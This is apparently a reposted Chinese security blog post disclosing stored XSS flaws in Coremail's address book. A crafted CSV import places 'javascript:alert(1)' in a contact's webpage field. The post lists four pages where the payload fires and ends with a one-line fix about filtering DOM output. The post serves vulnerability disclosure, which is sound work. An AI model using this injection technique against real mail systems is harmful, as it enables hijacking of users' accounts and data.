Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网

时间: 2020-10-10|tag: 24次围观|0 条评论

coremail在个人通讯录处可以导入联系人,格式为csv。
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图
导入如下CSV:

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aaaaaaa,,@qq.com,,,,13132132132,,,,,,19881212,,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=
,,,,,,,,,,,,,,,FAMILY=
,,,,,,,,,,,,,,,COWORKERS=
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人

可见主页面已经转义了,没有触发:
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图1
但各个功能页面都存在触发的问题,列举如下:1.新建联系组时触发:
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图2
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图3
2.打印联系人时触发:
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图4
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图5
3.编辑组时触发:
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图6
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图7
4.清空联系人邮件时触发:
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图8
Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网插图9

解决方案:

dom操作该过滤的过滤
    上一篇: ALi CTF 2015 write up - 网站安全 - 自学php网

    下一篇: FengCms1.30注入(前台) - 网站安全 - 自学php网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Coremail某功能多处存储型XSS漏洞 – 网站安全 – 自学php网
   

还没有人抢沙发呢~